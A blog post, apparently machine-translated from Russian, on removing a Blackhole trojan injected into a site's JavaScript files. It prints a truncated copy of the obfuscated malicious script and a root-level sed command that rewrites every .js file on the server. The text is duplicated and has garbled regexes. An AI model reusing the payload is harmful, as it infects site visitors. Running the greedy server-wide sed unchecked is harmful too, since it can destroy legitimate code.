June 4, 2012 at 00:49Curing a site from a virus in javascript and other files using an example
Once, I received a letter from Yandex.Webmaster that one of my sites is infected - The site contains a code that could be dangerous for visitors and that the site is currently displayed in the search results marked "This site may threaten the security of your computer " .
A quick analysis showed that * .js files were infected - the code was added at the end of each of them: After analyzing the search engine output on the topic of searching and replacing text in linux files, I got several options for the console commands. Next, I logged in to the system via SSH and executed the command as root After its execution, all js files were cleared of the trojan.
This command searches for files with the .js extension throughout the server and looks for text in them that matches the regular expression try {q = document \ .createElement. *} , Which just describes the Trojan. Then it replaces this text with the line #cleaned.
After that, it is advisable to go through the entire server with an antivirus, for example clamav .
In the RedHat / CentOS family, you can install it with the command.
After that, execute the command.
It will scan the entire server recursively and save the report in the /home/scan-report.txt file . The report will only contain information about infected files.
Antivirus reports of infection:
ClamAV scan result - Trojan.Blackhole-483
The result of the Comodo check is TrojWare.JS.Blacole
I want to say that there are other ways to find and delete a substring in files, including outputting results, creating backup files, and faster options using ack-grep.
For example, various search and replace options are listed here.
PS. Thus, you can get rid of various similar infections. But remember, this is only the elimination of symptoms. After detecting and treating the infection, you need to analyze the server for vulnerabilities.
Read the logs in the / var / log / folder , the / var / log / messages file , and others available depending on your software and * nix distribution.
Update software, both server and site engines themselves and their modules. And if updating and tuning server software needs to be given to one specialist, then the engines of sites and their modules are most likely different.
UPD In the comments, they are urged to mention that under the given regular expression
/try{q=document\.createElement.*►/
any text starts that starts with
try {q = document \ .createElement and ends } .
Before use, I recommend making sure that you do not use such constructions in the code for good purposes or clarify the regular expression.
Use at your own risk. Before use and on time it is necessary to use the brain.
Thanks to the bookmarks, the usefulness of the post is now better visible despite the voting results.
A quick analysis showed that * .js files were infected - the code was added at the end of each of them: After analyzing the search engine output on the topic of searching and replacing text in linux files, I got several options for the console commands. Next, I logged in to the system via SSH and executed the command as root After its execution, all js files were cleared of the trojan.
try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} find / -name "*.js" -type f -print0 | xargs -0 sed -i 's/try{q=document\.createElement.*}/#cleaned/g'This command searches for files with the .js extension throughout the server and looks for text in them that matches the regular expression try {q = document \ .createElement. *} , Which just describes the Trojan. Then it replaces this text with the line #cleaned.
After that, it is advisable to go through the entire server with an antivirus, for example clamav .
In the RedHat / CentOS family, you can install it with the command.
yum install clamavAfter that, execute the command.
clamscan -ri -l /home/scan-report.txt /It will scan the entire server recursively and save the report in the /home/scan-report.txt file . The report will only contain information about infected files.
Antivirus reports of infection:
ClamAV scan result - Trojan.Blackhole-483
The result of the Comodo check is TrojWare.JS.Blacole
I want to say that there are other ways to find and delete a substring in files, including outputting results, creating backup files, and faster options using ack-grep.
For example, various search and replace options are listed here.
PS. Thus, you can get rid of various similar infections. But remember, this is only the elimination of symptoms. After detecting and treating the infection, you need to analyze the server for vulnerabilities.
Read the logs in the / var / log / folder , the / var / log / messages file , and others available depending on your software and * nix distribution.
Update software, both server and site engines themselves and their modules. And if updating and tuning server software needs to be given to one specialist, then the engines of sites and their modules are most likely different.
UPD In the comments, they are urged to mention that under the given regular expression
/try{q=document\.createElement.*►/
any text starts that starts with
try {q = document \ .createElement and ends } .
Before use, I recommend making sure that you do not use such constructions in the code for good purposes or clarify the regular expression.
Use at your own risk. Before use and on time it is necessary to use the brain.
Thanks to the bookmarks, the usefulness of the post is now better visible despite the voting results.